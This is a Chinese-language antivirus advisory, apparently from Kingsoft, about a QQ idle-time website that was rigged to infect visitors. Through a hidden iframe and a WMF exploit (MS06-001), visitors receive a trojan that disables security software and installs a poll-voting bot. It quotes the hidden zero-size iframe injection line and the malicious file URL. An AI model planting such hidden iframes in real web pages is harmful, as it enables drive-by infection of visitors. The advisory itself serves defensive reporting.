近日金山应急处理中心接到用户投诉,访问QQ的一个挂机网站http://www.qqgjw.com,机器出现异常现象。经金山反病毒专家分析,病毒制作者利用该网站的一个漏洞在上面内置了一个黑客程序,一旦用户访问该网站,将会在机器内被强制安装一个“投票机(Win32.Joke.VoteBot)”的恶意程序。
网页中内置代码如下:
<iframe src="images/logo.wmf" widht=0 height=0></iframe>
实际指向文件 http://www.qqgjw.com/images/logo.wmf
据金山毒霸反病毒专家介绍,被内置的wmf文件利用微软MS06-001漏洞下载一个名为services.exe的木马程序,金山毒霸命名该木马程序为“Win32.Troj.Startpage.mg”。该病毒会常驻在被攻击的系统内,并修改用户的注册表,在用户系统启动的同时启动该程序。为了达到隐藏自己的目的,该病毒还会结束知名安全软件,从而大大降低了用户系统的安全性。同时,反病毒专家指出,该病毒的最终目的是让用户下载另外的恶意程序—投票机(Win32.Joke.VoteBot),病毒作者将会远程控制用户的机器,随意为各大评选活动的指定的对象投票。
投票机(Win32.Joke.VoteBot)在19日上午为如下网址投票
http://poll.chinacourt.org/2005fg10j/2005fg10j.php
该网页是“2005中国法官十杰评选活动”
投票机(Win32.Joke.VoteBot.a)在19日下午为如下网址投票
http://jxwm.jxgdw.com/huodong/05wmdw/index9.php
该网页是“江西省文明单位、文明城市、文明村镇申报推荐”
此外,该病毒还可修改用户IE设置,扰乱正常的网络浏览。虽然当前该功能未能得逞,但不排除在以后的版本中实现。
金山毒霸反病毒专家分析,病毒作者通过该网页传播病毒的目的是为此种恶意投票的方法做实验。一旦实验效果明显,病毒作者可能会主动联系被投票的目标以索取报酬。这也将成为病毒制作者新的获利方式。
该病毒只通过网页和漏洞进行传播,目前还不具备太大的传播量,但是由于利益的刺激不排除病毒作者制作更为功能强大的病毒。由于投票所需要的巨大网页点击量,病毒作者会将病毒的传播性做得更强,以不断扩大自身的传播途径,比如:加入QQ、MSN的传播,邮件传播等。
安全中国首页 > 新闻中心 > 热门病毒信息